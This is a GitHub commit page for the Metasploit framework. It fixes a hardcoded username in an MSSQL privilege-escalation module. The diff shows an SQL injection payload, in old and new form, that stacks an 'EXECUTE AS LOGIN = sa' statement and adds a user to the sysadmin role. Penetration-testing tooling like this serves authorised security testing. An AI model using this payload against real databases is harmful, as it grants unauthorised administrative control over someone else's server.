Skip to content

Commit ac0e23d

Browse files
wvuwvu
committed
Land rapid7#4932, hardcoded username fix
For mssql_escalate_execute_as_sqli.
2 parents b0a8fd8 + 00dbcc1 commit ac0e23d

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -190,10 +190,10 @@ def check_imp_sysadmin(imp_user_list)
190190
end
191191

192192
# Attempt to escalate privileges
193-
def escalate_privs(imp_user,db_user)
193+
def escalate_privs(db_user)
194194

195195
# Setup Query - Impersonate the first sysadmin user on the list
196-
evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember 'MyUser1','sysadmin';Revert;--"
196+
evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '#{db_user}','sysadmin';Revert;--"
197197

198198
# Execute Query
199199
mssql_query(evil_sql)

0 commit comments

Comments
 (0)